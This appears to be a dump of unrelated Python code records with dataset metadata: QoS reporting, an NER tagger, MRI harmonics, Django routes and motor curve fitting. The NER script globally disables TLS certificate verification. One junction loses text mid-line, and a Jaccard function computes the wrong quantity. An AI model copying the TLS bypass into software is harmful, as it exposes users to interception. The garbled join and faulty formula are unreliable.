target_model,\n model_num_labels,\n image_nc,\n BOX_MIN,\n BOX_MAX,\n args)\n\n advGAN.train(dataloader, args.epoch)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"141568534","text":"class Girl:\r\n\t'constructor for class girl'\r\n\tdef __init__(self,name_id,attr,main_bgt,intlg,t):\r\n\t\tself.name_id=name_id\r\n\t\tself.attr=attr\r\n\t\tself.main_bgt=main_bgt\r\n\t\tself.intlg=intlg\r\n\t\tself.t=t\r\n\t\tself.status='single'\r\n\t\tself.happiness=0\r\n\t\tself.bf=''\r\n\t'couple formation condition'\r\n\tdef constraint(self,bgt):\r\n\t\tif(self.main_bgt>bgt):\r\n\t\t\treturn False\r\n\t\telse:\r\n\t\t\treturn True\r\n\t'set bf for girl if condition satisfies'\r\n\tdef set_bf(self,bf):\r\n\t\tself.bf=bf\r\n\t'set happiness'\r\n\tdef set_happiness(self,happiness):\r\n\t\tself.happiness=happiness\r\n\r\n\r\n\r\n","sub_path":"PPLq8/girl.py","file_name":"girl.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"122386405","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n This script compares the QoS data from table MOS_E2E_2 between two weeks\r\n to see an possible increase\r\n\"\"\"\r\n\r\n__author__ = \"Stuebner.Matthias\"\r\n__copyright__ = \"Copyright 2012, Stuebner.Matthias\"\r\n__credits__ = [\"Stuebner.Matthias\"]\r\n__license__ = \"GPL\"\r\n__version__ = \"$Rev$\"\r\n__maintainer__ = \"Stuebner.Matthias\"\r\n__email__ = \"matthias.stuebner@kabeldeutschland.de\"\r\n__status__ = \"Alpha\"\r\n\r\nfrom config_file import config_na1 as database\r\nfrom datetime import date, timedelta\r\nimport Database.OracleSQLObj as oracle\r\nimport Tools.excel_read_write as xls\r\nfrom Graphics.diagram_layout_maker import Diagramm_Layout_Maker as diagram_layout\r\n\r\ndef processDelay(deltaListe):\r\n delayDelta = {}\r\n for k,v in deltaListe.iteritems():\r\n delayDelta[k] = v[2]\r\n\r\n l = [x for x in delayDelta.iteritems()]\r\n l = sorted(l,key=lambda x: x[1],reverse=True)\r\n\r\n print('\\nTOP10 Anstieg Delay-Violation Anstieg: ')\r\n i=0\r\n for el in l:\r\n if i < 11:\r\n print('CMTS: ',el[0],' Abweichung Delay: ',round(el[1],3))\r\n i=i+1\r\n \r\ndef processPloss(deltaListe):\r\n plossDelta = {}\r\n for k,v in deltaListe.iteritems():\r\n plossDelta[k] = v[0]\r\n\r\n l = [x for x in plossDelta.iteritems()]\r\n l = sorted(l,key=lambda x: x[1],reverse=True)\r\n\r\n print('\\nTOP10 Anstieg PLoss-Violation Anstieg: ')\r\n i=0\r\n for el in l:\r\n if i < 11:\r\n print('CMTS: ',el[0],' Abweichung PLoss: ',round(el[1],3))\r\n i=i+1\r\n \r\n\r\ndef processJitter(deltaListe): \r\n jitterDelta = {}\r\n for k,v in deltaListe.iteritems():\r\n jitterDelta[k] = v[1]\r\n\r\n l = [x for x in jitterDelta.iteritems()]\r\n l = sorted(l,key=lambda x: x[1],reverse=True)\r\n\r\n print('\\nTOP10 Anstieg Jitter-Violation Anstieg: ')\r\n i=0\r\n for el in l:\r\n if i < 11:\r\n print('CMTS: ',el[0],' Abweichung Jitter: ',round(el[1],3))\r\n i=i+1\r\n\r\ndef processMos(deltaListe):\r\n mosDelta = {}\r\n for k,v in deltaListe.iteritems():\r\n mosDelta[k] = v[3]\r\n\r\n l = [x for x in mosDelta.iteritems()]\r\n l = sorted(l,key=lambda x: x[1],reverse=True)\r\n\r\n print('\\nTOP10 Anstieg MOS-Violation Anstieg: ')\r\n i=0\r\n for el in l:\r\n if i < 11:\r\n print('CMTS: ',el[0],' Abweichung MOS: ',round(el[1],3))\r\n i=i+1\r\n\r\ndef buildData():\r\n sql = \"\"\"\r\nselect \r\n t1.*\r\nfrom\r\n(\r\n select \r\n WEEK,\r\n cmts_name,\r\n sum(\"Completed Calls with QoS (Nb)\"),\r\n sum(\"Bad Calls / MOS (Nb)\"),\r\n sum(\"Technical Failed Calls (Nb)\"),\r\n sum(\"Bad Calls / Packet Loss (Nb)\"),\r\n sum(\"Bad Calls / Jitter (Nb)\"),\r\n sum(\"Bad Calls / Delay (Nb)\"),\r\n round(sum(\"Bad Calls / Packet Loss (Nb)\") / sum(\"Completed Calls with QoS (Nb)\") * 100, 3) as \"PacketLoss(%)\",\r\n round(sum(\"Bad Calls / Jitter (Nb)\") / sum(\"Completed Calls with QoS (Nb)\") * 100, 3) as \"Jitter(%)\",\r\n round(sum(\"Bad Calls / Delay (Nb)\") / sum(\"Completed Calls with QoS (Nb)\") * 100, 3) as \"Delay(%)\",\r\n round(sum(\"Bad Calls / MOS (Nb)\") / sum(\"Completed Calls with QoS (Nb)\") * 100, 3) as \"BadMOS(%)\",\r\n ROUND(SUM(\"Technical Failed Calls (Nb)\") / SUM(\"Completed Calls with QoS (Nb)\") * 100, 3) as \"Techn_failed(%)\"\r\n from\r\n (\r\n select \r\n to_char(id_date,'IYIW') as WEEK\r\n ,m.*\r\n from MOS_E2E_2 m\r\n where \"Completed Calls with QoS (Nb)\" > 1000\r\n and \"Bad Calls / MOS (Nb)\" <> 0\r\n and to_char(id_date,'IYIW') >= to_char(sysdate-14,'IYIW')\r\n and 
to_char(id_date,'IYIW') < TO_CHAR(sysdate,'IYIW')\r\n )\r\n-- where cmts_name = 'hb-neue-cmts-13'\r\n group by \r\n WEEK,\r\n CMTS_NAME\r\n) t1\r\norder by week desc\r\n \"\"\"\r\n \r\n db = oracle.OracleSQL()\r\n res = db.executeSQL(sql)\r\n del db\r\n\r\n # Build dictionary of CMTS with one list per week\r\n cmtsListe = {}\r\n for i in range(len(res)):\r\n # res[0]: week\r\n # res[1]: cmts_name\r\n # res[8]: packetLoss_viol_rate\r\n # res[9]: jitter_viol_rate\r\n # res[10]: delay_viol_rate\r\n # res[11]: MOS_viol_rate\r\n \r\n ds = [res[i][0], # week\r\n res[i][8], # packetLoss_viol_rate\r\n res[i][9], # jitter_viol_rate\r\n res[i][10], # delay_viol_rate\r\n res[i][11]] # MOS_viol_rate\r\n if res[i][1] not in cmtsListe:\r\n cmtsListe[res[i][1]] = [ds]\r\n else:\r\n cmtsListe[res[i][1]].append(ds)\r\n\r\n # Build dictionary with CMTS and the delta of each value pair\r\n # positiver Wert: Verschlechterung\r\n deltaListe = {}\r\n for k, v in cmtsListe.iteritems():\r\n if len(v) == 2:\r\n deltaListe[k] = [v[0][1] - v[1][1]] # packetloss_viol_rate \r\n deltaListe[k] += [v[0][2] - v[1][2]] # jitter_viol_rate\r\n deltaListe[k] += [v[0][3] - v[1][3]] # delay_viol_rate\r\n deltaListe[k] += [v[0][4] - v[1][4]] # MOS_viol_rate\r\n\r\n return deltaListe\r\n\r\nif __name__ == '__main__':\r\n\r\n deltaListe = buildData()\r\n processDelay(deltaListe)\r\n processJitter(deltaListe)\r\n processPloss(deltaListe)\r\n processMos(deltaListe)\r\n\r\n# x = Excel_in_out()\r\n# x.write(data, filename=\"filename\", titleline=False)\r\n\r\n\r\n\r\n print('beendet')","sub_path":"naos-python/Source/MS/NHR/QoS-Veraenderung-zur-Vorwoche.py","file_name":"QoS-Veraenderung-zur-Vorwoche.py","file_ext":"py","file_size_in_byte":5238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"653282619","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\ni = int(input())\nk=0\nl=list()\nwhile(k List[Token]:\n tagged_words = []\n i = 0\n print(\"words to tag: {}\".format(str(len(words))))\n for word in words:\n if self.__check_no_entity(word):\n tagged_words.append(Token(word.value, self.__tag_no_entity, word.pos_tagging))\n else:\n tag = self.__check_rules(word)\n tagged_words.append(Token(word.value, tag, word.pos_tagging))\n i += 1\n if i % 1000 == 0:\n print(i)\n return tagged_words\n\n def __check_no_entity(self, word: Token) -> bool:\n if word.value in self.stopwords_list:\n return True\n elif word.value in self.punctuation:\n return True\n else:\n return False\n\n def __check_rules(self, word: Token) -> str:\n keys = list(self.dictionary.keys())\n\n if word.pos_tagging in self.pos_tagging:\n if word.value in keys:\n return self.dictionary[word.value]\n else:\n tag = self.__tag_no_entity\n # found, tag = self.__check_distance(word, keys)\n # if found:\n # return tag\n # else:\n # found, tag = self.__check_word_stems(word, keys)\n\n else:\n tag = self.__tag_no_entity\n return tag\n\n def __check_distance(self, word: Token, keys) -> (bool, str):\n # calculate edit-distances\n relevant_keys = [k for k in keys if np.abs(len(k) - len(word.value)) < 4]\n\n if len(word.value) < 4:\n distance, index = self.__min_edit_distance(word, relevant_keys)\n\n if distance < round(math.floor(len(word.value)) * 0.9):\n return True, self.dictionary[relevant_keys[index]]\n else:\n return False, self.__tag_no_entity\n else:\n similarity, index = self.__max_jaccard_similarity(word, relevant_keys, 3)\n\n if similarity > 0.8:\n return True, self.dictionary[relevant_keys[index]]\n else:\n return False, self.__tag_no_entity\n\n @staticmethod\n def __min_edit_distance(word: Token, keys) -> (float, int):\n # calculate edit-distances\n distances = list(map(lambda x: edit_distance(word.value, x), keys))\n # get index where distance is minimal - conflict resolution happens here as we just pick first index_min\n index_min = min(range(len(distances)), key=distances.__getitem__)\n return distances[index_min], index_min\n\n @staticmethod\n def __max_jaccard_similarity(word: Token, keys, gram_number) -> (float, int):\n # calculate jaccard-distances\n distances = list(map(lambda x: jaccard_similarity(set(ngrams(word.value, gram_number)),\n set(ngrams(x, gram_number))), keys))\n index_max = max(range(len(distances)), key=distances.__getitem__)\n return distances[index_max], index_max\n\n def __check_word_stems(self, word, keys) -> (bool, str):\n stemmer = SnowballStemmer(\"english\")\n stemmed_word = stemmer.stem(word.value)\n stemmed_keys = list(map(lambda x: stemmer.stem(x), keys))\n\n if stemmed_word in stemmed_keys:\n idx = stemmed_keys.index(stemmed_word)\n return True, self.dictionary[keys[idx]]\n\n return False, self.__tag_no_entity\n\n\ndef jaccard_similarity(label1: set, label2: set) -> float:\n intersection_cardinality = (len(label1.union(label2)) - len(label1.intersection(label2)))\n union_cardinality = len(label1.union(label2))\n\n if intersection_cardinality > 0 and union_cardinality > 0:\n result = intersection_cardinality / float(union_cardinality)\n else:\n result = 0\n return result\n\n\ndef main():\n if len(sys.argv) < 2:\n input_file = \"./../data/uebung4-training.iob\"\n train_tagger(input_file)\n print('---- Training for NER-Tagger is finished ----')\n elif len(sys.argv) == 3:\n input_file = sys.argv[1]\n output_file = sys.argv[2]\n 
tag_tokens(input_file, output_file)\n print('---- NER-Tagger finished, see result in output file ----')\n else:\n print(sys.argv[1].lower())\n print('Oops, something went wrong, please check if you called the script correctly :)')\n\n\ndef train_tagger(input_file):\n gold_std, pos_taggings = build_dict_from_input_file(input_file)\n additional_dictionary = build_additional_dict(\"./../data/dictionary/human-genenames.txt\")\n dictionary = concatenate_dicts(gold_std, additional_dictionary)\n stopwords_list = build_stopwords()\n punctuation = set(string.punctuation)\n tagger = NERTagger(dictionary, stopwords_list, punctuation, pos_taggings)\n tagger.save_dictionaries()\n\n\ndef tag_tokens(input_file, output_file):\n tokens = read_tokens_from_input_file(input_file)\n tagger = NERTagger()\n tagged_list = tagger.tag_tokens(tokens)\n write_annotations_to_file(tagged_list, output_file)\n\n\ndef build_dict_from_input_file(path) -> (dict, set):\n entities_from_file = {}\n pos_taggings_from_file = []\n with open(path, \"r\", encoding='latin-1') as f:\n for token in get_tokens_from_input_file(f.readlines()):\n if token.tag != \"O\":\n entities_from_file[token.value] = token.tag\n pos_taggings_from_file.append(token.pos_tagging)\n return entities_from_file, set(pos_taggings_from_file)\n\n\ndef build_additional_dict(path: str) -> dict:\n entities_from_file = {}\n with open(path, \"r\", encoding='latin-1') as f:\n for token in get_tokens_from_list(f.readlines()):\n entities_from_file[token] = \"B-protein\"\n return entities_from_file\n\n\ndef concatenate_dicts(gold_std, additional_dict) -> dict:\n set1 = set(list(gold_std.items()))\n set2 = set(list(additional_dict.items()))\n set_conc = set1.union(set2)\n return dict(set_conc)\n\n\ndef build_stopwords() -> set:\n nltk.download('stopwords')\n stopwords_list = []\n path = \"./../data/dictionary/english_stop_words.txt\"\n with open(path, \"r\", encoding='latin-1') as f:\n for token in get_tokens_from_list(f.readlines()):\n stopwords_list.append(token)\n return set(stopwords_list).union(set(stopwords.words('english')))\n\n\ndef read_tokens_from_input_file(path) -> List[Token]:\n with open(path, \"r\", encoding='latin-1') as f:\n tokens = get_tokens_from_input_file(f.readlines())\n return tokens\n\n\ndef write_annotations_to_file(annotations: List[Token], output_file):\n my_file = open(output_file, 'w')\n for token in annotations:\n my_file.write(\"{}\\t{}\\n\".format(token.value, token.tag))\n my_file.close()\n\n\ndef get_tokens_from_list(lines) -> list:\n tokens = []\n for line in lines:\n if len(line) > 0:\n found_tokens = word_tokenize(line)\n if len(found_tokens) == 1:\n tokens.append(found_tokens[0])\n return tokens\n\n\ndef get_tokens_from_input_file(lines) -> List[Token]:\n words = []\n tags = []\n pos_taggings = []\n tokens = []\n # reading words / tags\n for line in lines:\n if len(line) > 0:\n found_tokens = word_tokenize(line)\n if len(found_tokens) == 2:\n words.append(found_tokens[0])\n tags.append(found_tokens[1])\n # reading pos-tags\n for pos_tagging in pos_tag(words):\n pos_taggings.append(pos_tagging[1])\n # concatenate all\n for i in range(len(words)):\n tokens.append(Token(words[i], tags[i], pos_taggings[i]))\n return tokens\n\n\nif __name__ == '__main__':\n try:\n _create_unverified_https_context = ssl._create_unverified_context\n except AttributeError:\n pass\n else:\n ssl._create_default_https_context = _create_unverified_https_context\n 
main()\n","sub_path":"tutorial_4/ner/uebung4-gruppe7.py","file_name":"uebung4-gruppe7.py","file_ext":"py","file_size_in_byte":9263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"315813950","text":"from scipy import special as sci\nimport numpy as np\nimport torch.nn as nn\nimport torch\nfrom dipy.reconst import dti\nfrom dipy.data import gradient_table\nfrom dipy.io.image import save_nifti\n\n\nclass Signal2SH(nn.Module):\n \"\"\"\n Signal2SH(dwi) -> dwi_sh\n\n Computes the corresponding spherical harmonic coefficients\n\n Args:\n x_in (5D tensor): input dwi tensor\n x_in.size(): (Batchsize x Number of shells * Number of gradients x DimX x DimY x DimZ)\n y (5D tensor): corresponding harmonic coefficients tensor\n y.size(): (Batchsize x Number of shells*Number of coefficients x DimX x DimY x DimZ)\n \"\"\"\n\n def __init__(self, sh_order, gradients, lb_lambda=0.006):\n super(Signal2SH, self).__init__()\n self.sh_order = sh_order\n self.lb_lambda = lb_lambda\n self.num_gradients = gradients.shape[0]\n self.num_coefficients = int((self.sh_order + 1) * (self.sh_order / 2 + 1))\n\n b = np.zeros((self.num_gradients, self.num_coefficients))\n l = np.zeros((self.num_coefficients, self.num_coefficients))\n for id_gradient in range(self.num_gradients):\n id_column = 0\n for id_order in range(0, self.sh_order + 1, 2):\n for id_degree in range(-id_order, id_order + 1):\n gradients_phi, gradients_theta, gradients_z = cart2sph(gradients[id_gradient, 0],\n gradients[id_gradient, 1],\n gradients[id_gradient, 2])\n y = sci.sph_harm(np.abs(id_degree), id_order, gradients_phi, gradients_theta)\n\n if id_degree < 0:\n b[id_gradient, id_column] = np.real(y) * np.sqrt(2)\n elif id_degree == 0:\n b[id_gradient, id_column] = np.real(y)\n elif id_degree > 0:\n b[id_gradient, id_column] = np.imag(y) * np.sqrt(2)\n\n l[id_column, id_column] = self.lb_lambda * id_order ** 2 * (id_order + 1) ** 2\n id_column += 1\n\n b_inv = np.linalg.pinv(np.matmul(b.transpose(), b) + l)\n self.Signal2SHMat = torch.from_numpy(np.matmul(b_inv, b.transpose()).transpose()).float()\n if torch.cuda.is_available():\n self.Signal2SHMat = self.Signal2SHMat.cuda()\n\n def forward(self, x_in):\n x = x_in.view(-1, np.ceil(x_in.size(1) / self.num_gradients).astype(int), self.num_gradients, x_in.size(2),\n x_in.size(3), x_in.size(4))\n x = x.permute(0, 1, 3, 4, 5, 2)\n y = x.matmul(self.Signal2SHMat)\n y = y.permute(0, 1, 5, 2, 3, 4).contiguous().view(x.size(0), -1, x_in.size(2), x_in.size(3), x_in.size(4))\n return y\n\n\nclass SH2Signal(nn.Module):\n \"\"\"\n SH2Signal(dwi_sh) -> dwi\n\n Computes the corresponding dwi signal for each gradient\n\n Args:\n x_in (5D tensor): input spherical harmonic tensor\n x_in.size(): (Batchsize x Number of shells*Number of coefficients x DimX x DimY x DimZ)\n y (5D tensor): corresponding dwi tensor\n y.size(): (Batchsize x Number of shells * Number of gradients x DimX x DimY x DimZ)\n \"\"\"\n\n def __init__(self, sh_order, gradients):\n super(SH2Signal, self).__init__()\n self.sh_order = sh_order\n self.num_gradients = gradients.shape[0]\n self.num_coefficients = int((self.sh_order + 1) * (self.sh_order / 2 + 1))\n\n SH2SignalMat = np.zeros((self.num_coefficients, self.num_gradients))\n for id_gradient in range(self.num_gradients):\n id_coefficient = 0\n for id_order in range(0, self.sh_order + 1, 2): # even order only\n for id_degree in range(-id_order, id_order + 1):\n gradients_phi, gradients_theta, gradients_z = cart2sph(gradients[id_gradient, 0],\n gradients[id_gradient, 1],\n gradients[id_gradient, 2])\n y = sci.sph_harm(np.abs(id_degree), id_order, gradients_phi, gradients_theta)\n if id_degree < 0:\n SH2SignalMat[id_coefficient, id_gradient] = np.real(y) * 
np.sqrt(2)\n elif id_degree == 0:\n SH2SignalMat[id_coefficient, id_gradient] = np.real(y)\n elif id_degree > 0:\n SH2SignalMat[id_coefficient, id_gradient] = np.imag(y) * np.sqrt(2)\n\n id_coefficient += 1\n\n self.SH2SignalMat = torch.from_numpy(SH2SignalMat).float()\n if torch.cuda.is_available():\n self.SH2SignalMat = self.SH2SignalMat.cuda()\n\n def forward(self, x_in):\n x_dim = x_in.size()\n x = x_in.view(-1, np.ceil(x_in.size(1) / self.num_coefficients).astype(int), self.num_coefficients,\n x_in.size(-3), x_in.size(-2), x_in.size(-1))\n x = x.permute(0, 1, 3, 4, 5, 2)\n y = x.matmul(self.SH2SignalMat)\n y = y.permute(0, 1, 5, 2, 3, 4).contiguous().view(x_dim[0], -1, x_dim[-3], x_dim[-2], x_dim[-1])\n return y\n\n\n# helper functions\ndef cart2sph(x, y, z):\n \"\"\"\n cart2sph(x, y, z) -> theta, phi, r\n\n Computes the corresponding spherical coordinate of the given input parameters :attr:`x`, :attr:`y` and :attr:`x`.\n\n Args:\n x (Number): x position\n y (Number): y position\n z (Number): z position\n\n Example::\n\n >>> cart2sph(1, 1, 1)\n (0.78539816339744828, 0.95531661812450919, 1.7320508075688772)\n\n \"\"\"\n azimuthal_angle = np.arctan2(y, x)\n radial_distance = np.sqrt(x**2 + y**2 + z**2)\n polar_angle = np.arccos(z/radial_distance)\n return azimuthal_angle, polar_angle, radial_distance\n\n\ndef sph2cart(azimuthal_angle, polar_angle, radial_distance):\n \"\"\"\n sph2cart(polar_angle, azimuthal_angle, radial_distance) -> x, y, z\n\n Computes the corresponding cartesian coordinate of the given input parameters :attr:`polar_angle`,\n :attr:`azimuthal_angle` and :attr:`radial_distance`.\n\n Args:\n polar_angle (Number): polar_angle\n azimuthal_angle (Number): azimuthal_angle\n radial_distance (Number): radial_distance\n\n Example::\n\n >>> cart2sph(0.78539816339744828, 0.95531661812450919, 1.7320508075688772)\n (0.99999999999999978, 0.99999999999999967, 1.0)\n\n \"\"\"\n x = radial_distance * np.sin(polar_angle) * np.cos(azimuthal_angle)\n y = radial_distance * np.sin(polar_angle) * np.sin(azimuthal_angle)\n z = radial_distance * np.cos(polar_angle)\n return x, y, z\n\n\ndef fit_dti(dwi, bvecs, bvalue):\n bvecs = bvecs / np.sqrt(np.sum(bvecs**2, axis=1, keepdims=True))\n bvecs = np.concatenate((np.ones((1, 3))/np.sqrt(3), bvecs))\n bvals = np.zeros((bvecs.shape[0]))\n bvals[1:] = bvalue\n gtab = gradient_table(bvals=bvals, bvecs=bvecs)\n tenmodel = dti.TensorModel(gtab)\n tenfit = tenmodel.fit(dwi)\n\n eigenvectors = tenfit.evecs\n eigenvalues = np.ones(eigenvectors.shape) * np.eye(3)\n eigenvalues *= np.expand_dims(tenfit.evals, -1)\n\n dti_tensor = np.matmul(np.matmul(eigenvectors, eigenvalues), eigenvectors.transpose(0, 1, 2, 4, 3))\n return dti_tensor\n\n\ndef save_fiber(file_name, streamlines, ref_shape, ref_affine):\n fiber_file = np.zeros(ref_shape)\n for id_streamline, current_streamline in enumerate(streamlines):\n for id_pos, current_pos in enumerate(current_streamline):\n current_pos = np.array(current_pos).astype(int)\n try:\n fiber_file[current_pos[0], current_pos[1], current_pos[2]] = 1\n except:\n print('Oh oh...')\n\n save_nifti(fname=file_name, data=fiber_file, affine=ref_affine)\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"7083287","text":"from django.conf.urls import include, url\nfrom . import views\t\t#импорт всех представлений из приложения shop\nimport paypal.standard.ipn.urls\nimport django.contrib.auth.views as auth_views\n\n\nurlpatterns = [\n\turl(r'^$', views.main_page, name='main_page'),\n\turl(r'^delivery/$', views.delivery, name='delivery'),\n\turl(r'^contacts/$', views.contacts, name='contacts'),\n\turl(r'^cart/$', views.cart, name='cart'),\n\turl(r'^cart/delete(?P[0-9]+)/$', views.del_product, name='del_product'),\n\turl(r'^catalog/cookies/$', views.cookies, name='cookies'),\n\turl(r'^catalog/cupcakes/$', views.cupcakes, name='cupcakes'),\n\turl(r'^catalog/cakes/$', views.cakes, name='cakes'),\n\turl(r'^product/(?P[0-9]+)/$', views.product, name='product'),\n\t# auth\n\turl(r'^accounts/login/$', views.account_login, name='login'),\n\turl(r'^accounts/signup/$', views.account_signup, name='signup'),\n\turl(r'^accounts/logout/$', views.account_logout, name='logout'),\n \turl(r'^accounts/profile/$', views.account_profile, name='profile'),\n # pay\n url(r'^payment/pay/$', views.payment_pay, name='pay'),\n url(r'^payment/success/$', views.payment_success, name='success'),\n url(r'^paypal/', include(paypal.standard.ipn.urls)),\n]\n","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"62661189","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ncharacter_list = {\n '电压': 'U',\n '电流': 'I',\n '电阻': 'R',\n '转数': 'N',\n '力矩常数': 'Kt',\n '粘性摩擦系数': 'bm',\n '反电势常数': 'Ke',\n '负载力矩': 'Ml',\n '静摩擦力矩': 'Mf',\n}\n#打印参数表\nfor x in character_list:\n print('%r:%r'%(x,character_list[x]))\n\n\n#standard unit\nVOL = 1 #Volt\nMNM = 0.001 #Torque\nRPM = 2*np.pi/60 #Speed\n\n\n# define the function of calculating the values of the DC_motor's character parameters\ndef fit_characters(matrix, rtol = 0.00001):\n '''\n ******input arguments*******\n matrix : n × [voltage, torque, velocity , current]\n n >= 2\n Units:\n voltage: V\n torque: N.m\n velocity: rad/s\n current: A\n \n ******return values*******\n (resistance, back_emf_const, torque_const, friction, damping)\n Units:\n resistance: Ohm\n back_emf_const: V / (rad/s)\n torque_const: N.m / A\n friction: N.m\n damping: N.m / (rad/s)\n bm_max: N.m / (rad/s)\n Mf_max: N.m\n \n '''\n matrix = np.array(matrix) # change the form of matrix \n # get the values of voltage,current,velocity and torque\n vol = matrix[:, 0] \n tor = matrix[:, 1]\n vel = matrix[:, 2]\n cur = matrix[:, 3]\n \n # calculate the values of resistance and Ke\n A = np.column_stack((vel, cur))\n Ke, R = np.linalg.lstsq(A, vol)[0]\n\n # calculate the values of Kt,bm,Mf and define the range of bm and Mf \n vol_mean = np.mean(vol)\n\n if np.allclose(vol, vol_mean, rtol, 0):\n\n A = np.column_stack((cur, -vel))\n K_t_1, bm_max = np.linalg.lstsq(A, tor)[0]\n\n A = np.column_stack((cur, -np.ones(vel.shape[0])))\n K_t_2, Mf_max = np.linalg.lstsq(A, tor)[0]\n\n Kt = (K_t_1 + K_t_2) / 2.0\n Mf = Mf_max / 2.0\n bm = bm_max / 2.0\n\n else:\n A = np.column_stack((cur, -vel, -np.ones(vel.shape[0])))\n K_t, b_m, f = np.linalg.lstsq(A, tor)[0]\n\n return R, Ke, Kt, Mf, bm, bm_max, Mf_max\n \n\n# define the function of getting the values of DC_motor character parameters\ndef get_characters(num_points, voltage, resistance, back_emf_const, torque_const, friction, damping):\n '''\n to get DC motor main characteristics by main parameter, voltage, resistance, back_emf_const,\n torque_const, friction, damping\n ******input arguments*******\n\n num_points >= 2\n Units:\n voltage: V\n resistance: Ohm\n back_emf_const: V / (rad/s)\n torque_const: N.m / A\n friction: N.m\n damping: N.m / (rad/s)\n\n ******return values*******\n return a matrix : num_points × [voltage, torque, velocity, current]\n Units:\n voltage: V\n torque: N.m\n velocity: rad/s\n current: A\n \n if num_points < 2, num_points = 2\n the first row of return matrix is no load condition\n the last row of return matrix is stall condition\n '''\n num_points = int(num_points)\n if num_points <= 2:\n num_points = 2\n \n R = resistance\n K_e = back_emf_const\n K_t = torque_const\n f = friction\n b_m = damping\n\n c = K_t * voltage / R\n b = b_m + K_t * K_e / R\n stall_tor = c - f\n no_load_vel = (c - f) / b\n\n no_load_cur = (f*K_e + voltage*b_m) / (R*b)\n vol = np.ones(num_points) * voltage\n vel = np.linspace(no_load_vel, 0, num_points)\n tor = np.linspace(0, stall_tor, num_points)\n cur = tor * K_e / (b*R) + no_load_cur\n\n return np.column_stack((vol, tor, vel, cur)).tolist()\n\n\n\nmatrix = [[12, 0*MNM, 9760.0*RPM, 0.32], [12, 160*MNM, 0*RPM, 15.43]]\n\n# calculate the characters of DC_motor\nresistance, back_emf_const, torque_const, friction, damping, bm_max, Mf_max = fit_characters(matrix)\nprint('R=%r\\tKe=%r\\nKt=%r\\tMf=%r\\tbm=%r\\nbm<=%r\\nMf<=%r\\n'%(resistance, back_emf_const, 
torque_const, friction, damping, bm_max, Mf_max))\n\n\n# plot main characteristic\n\nV = 12\nfit_matrix = get_characters(100, V, resistance, back_emf_const, torque_const, friction, damping)\nfit_matrix = np.array(fit_matrix)\npower = fit_matrix[:,1] * fit_matrix[:,2]\nefficiency = power / (fit_matrix[:,0] * fit_matrix[:,3]) * 100.0\ntor = fit_matrix[:,1] / MNM\nvel = fit_matrix[:,2] / RPM\ncur = fit_matrix[:,3] / 1\n\nfig, ax_velocity = plt.subplots(figsize = (8, 5.6), dpi=100)\nfig.subplots_adjust(left =0.12, right=0.74, top=0.92)\n\np1, = ax_velocity.plot(tor, vel, color='red', label='Velocity')\nax_velocity.set_xlabel('Torque (mN.m)', fontsize=12)\nax_velocity.set_ylabel('Velocity (rpm)', fontsize=12)\nax_velocity.set_xlim(0, 240)\n\nplt.xticks(np.linspace(0, 240, 13))\nplt.yticks(np.linspace(0, 16000, 9), ['0', '','4000', '','8000', '', '12000', '', '16000'])\nax_velocity.grid()\nax_velocity.set_title('SQ2953 {} V main characteristic fitting'.format(V), fontsize=16)\n \nax_velocity.text(0.25, 0.25, 'Resistant:',\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10)\nax_velocity.text(0.50, 0.25, '{:.3g} Ohm'.format(resistance),\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10, color='g') \nax_velocity.text(0.25, 0.20, 'back_emf_const:',\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10)\nax_velocity.text(0.50, 0.20, '{:.3g} V/(rad/s)'.format(back_emf_const),\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10, color='g') \nax_velocity.text(0.25, 0.15, 'Torque_const: ',\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10)\nax_velocity.text(0.50, 0.15, '{:.3g} Nm/A'.format(torque_const),\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10, color='g') \nax_velocity.text(0.25, 0.10, 'Friction: ',\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10)\nax_velocity.text(0.50, 0.10, '{:.3g} N.m'.format(friction),\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10, color='g') \nax_velocity.text(0.25, 0.05, 'Damping: ',\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10)\nax_velocity.text(0.50, 0.05, '{:.3g} N.m/(rad/s)'.format(damping),\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10, color='g') \n \nax_efficiency = ax_velocity.twinx()\np2, = ax_efficiency.plot(tor, efficiency, 'b-', label='Efficiency')\nax_efficiency.set_ylabel('Efficiency (%)', fontsize=12)\nax_efficiency.set_ylim(0, 80)\n\nax_current = ax_velocity.twinx()\np3, = ax_current.plot(tor, cur, 'g-', label='Current')\nax_current.set_ylabel('Current (mA)', fontsize=12)\nax_current.set_ylim(0, 24)\nplt.yticks(np.linspace(0, 24, 9), ['0', '', '6', '', '12', '', '18', '', '24'])\nax_current.spines['right'].set_position(('axes', 1.11))\n\nax_power = ax_velocity.twinx()\np4, = ax_power.plot(tor, power, 'm-', label='Power')\nax_power.set_ylabel('Power (W)', fontsize=12)\nax_power.set_ylim(0, 80)\nax_power.spines['right'].set_position(('axes', 1.26))\n\nlines = [p1, p2, p3, p4]\nlabels = [l.get_label() for l in lines]\nax_velocity.legend(lines, labels, loc='upper right', 